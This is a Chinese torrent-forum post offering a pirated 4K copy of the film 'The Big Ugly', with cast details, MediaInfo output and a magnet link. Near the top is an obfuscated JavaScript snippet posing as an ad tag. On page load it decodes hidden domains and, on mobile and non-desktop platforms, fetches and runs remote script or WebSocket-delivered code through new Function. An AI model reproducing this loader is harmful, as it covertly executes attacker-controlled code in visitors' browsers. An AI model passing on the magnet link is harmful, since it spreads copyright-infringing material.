大凶[双语字幕]迅雷下载.The.Big.Ugly.2020.2160p.HDR.UHD.BluRay.DTS-HD.MA.5.1.x265-10bit 9.67GB

版主小s 22天前 335

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 大凶 / 大凶险

◎片 名 The Big Ugly

◎年 代 2020

◎产 地 美国

◎类 别 剧情

◎语 言 英语

◎上映日期 2020-07-24(美国)

◎IMDb评分 6.0/10 from 2914 users

◎IMDb链接 https://www.imdb.com/title/tt9441638

◎豆瓣评分 4.8/10 from 97 users

◎豆瓣链接 https://movie.douban.com/subject/34938666/

◎片 长 106分钟

◎导 演 斯科特·维普 Scott Wiper

◎编 剧 斯科特·维普 Scott Wiper / 保罗·塔伦蒂诺 Paul Tarantino

◎主 演 朗·普尔曼 Ron Perlman

维尼·琼斯 Vinnie Jones

马尔科姆·麦克道威尔 Malcolm McDowell

尼可拉斯·博朗 Nicholas Braun

莱文·兰宾 Leven Rambin

伊利斯·莱韦斯克 Elyse Levesque

丹尼尔·布兰 Daniel Buran

勒诺拉·克里奇洛 Lenora Crichlow

乔丽·卡特 Joelle Carter

布鲁斯·麦克吉尔 Bruce McGill

马克·史密斯 Mark Rhino Smith

◎标 签 复仇 | 2020 | 美国 | 犯罪 | 黑帮 | 美国电影 | 剧情 | 英国

◎简 介

当伦敦黑帮头目投资西弗吉尼亚州的石油交易以期洗黑钱时,英裔美国人的关系恶化了。

  1. General

  2. Unique ID : 7599307565553077528795807296993281799 (0x5B792CA52CD0D5BD2C7BF0FF452C707)

  3. Complete name : The.Big.Ugly.2020.2160p.HDR.UHD.BluRay.DTS-HD.MA.5.1.x265-10bit-HDS.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 9.67 GiB

  7. Duration : 1 h 46 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 13.0 Mb/s

  10. Movie name : The Big Ugly 2020 2160p HDR UHD BluRay DTS-HD MA 5.1 x265-10bit-HDS

  11. Encoded date : UTC 2021-07-02 20:45:46

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. HDR format : SMPTE ST 2086, HDR10 compatible

  20. Codec ID : V_MPEGH/ISO/HEVC

  21. Duration : 1 h 46 min

  22. Bit rate : 11.1 Mb/s

  23. Width : 3 840 pixels

  24. Height : 1 600 pixels

  25. Display aspect ratio : 2.40:1

  26. Frame rate mode : Constant

  27. Frame rate : 23.976 (24000/1001/53354) FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 10 bits

  31. Bits/(Pixel*Frame) : 0.075

  32. Stream size : 8.26 GiB (85%)

  33. Title : @HDSky

  34. Writing library : x265 - H.265/HEVC codec

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.2020

  39. Transfer characteristics : PQ

  40. Matrix coefficients : BT.2020 non-constant

  41. Mastering display color primaries : Display P3

  42. Mastering display luminance : min: 0.0020 cd/m2, max: 1000 cd/m2

  43. Maximum Content Light Level : 739 cd/m2

  44. Maximum Frame-Average Light Level : 331 cd/m2


  45. Audio

  46. ID : 2

  47. Format : DTS XLL

  48. Format/Info : Digital Theater Systems

  49. Commercial name : DTS-HD Master Audio

  50. Codec ID : A_DTS

  51. Duration : 1 h 46 min

  52. Bit rate mode : Variable

  53. Bit rate : 1 839 kb/s

  54. Channel(s) : 6 channels

  55. Channel layout : C L R Ls Rs LFE

  56. Sampling rate : 48.0 kHz

  57. Frame rate : 93.750 FPS (512 SPF)

  58. Bit depth : 16 bits

  59. Compression mode : Lossless

  60. Stream size : 1.37 GiB (14%)

  61. Title : English

  62. Language : English

  63. Default : Yes

  64. Forced : No


  65. Text #1

  66. ID : 3

  67. Format : PGS

  68. Muxing mode : zlib

  69. Codec ID : S_HDMV/PGS

  70. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  71. Duration : 1 h 38 min

  72. Bit rate : 21.6 kb/s

  73. Count of elements : 1891

  74. Stream size : 15.3 MiB (0%)

  75. Title : CHS

  76. Language : Chinese

  77. Default : Yes

  78. Forced : No


  79. Text #2

  80. ID : 4

  81. Format : PGS

  82. Muxing mode : zlib

  83. Codec ID : S_HDMV/PGS

  84. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  85. Duration : 1 h 38 min

  86. Bit rate : 22.3 kb/s

  87. Count of elements : 1891

  88. Stream size : 15.7 MiB (0%)

  89. Title : CHT

  90. Language : Chinese

  91. Default : No

  92. Forced : No


  93. Text #3

  94. ID : 5

  95. Format : PGS

  96. Muxing mode : zlib

  97. Codec ID : S_HDMV/PGS

  98. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  99. Duration : 1 h 38 min

  100. Bit rate : 34.8 kb/s

  101. Count of elements : 1891

  102. Stream size : 24.6 MiB (0%)

  103. Title : CHS&ENG

  104. Language : Chinese

  105. Default : No

  106. Forced : No


  107. Text #4

  108. ID : 6

  109. Format : PGS

  110. Muxing mode : zlib

  111. Codec ID : S_HDMV/PGS

  112. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  113. Duration : 1 h 38 min

  114. Bit rate : 35.5 kb/s

  115. Count of elements : 1891

  116. Stream size : 25.0 MiB (0%)

  117. Title : CHT&ENG

  118. Language : Chinese

  119. Default : No

  120. Forced : No


  121. Menu

  122. 00:00:00.000 : en:Chapter 01

  123. 00:08:59.246 : en:Chapter 02

  124. 00:16:15.599 : en:Chapter 03

  125. 00:25:06.962 : en:Chapter 04

  126. 00:32:19.938 : en:Chapter 05

  127. 00:41:15.389 : en:Chapter 06

  128. 00:48:56.724 : en:Chapter 07

  129. 00:59:44.914 : en:Chapter 08

  130. 01:05:34.512 : en:Chapter 09

  131. 01:13:00.333 : en:Chapter 10

  132. 01:20:51.971 : en:Chapter 11

  133. 01:29:51.802 : en:Chapter 12

  134. 01:46:24.336 : en:Chapter 13



TAGS 剧情

磁力链:
  • magnet:?xt=urn:btih:35427E0B342AEFCA1BAE1F727F315419B19704B7
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回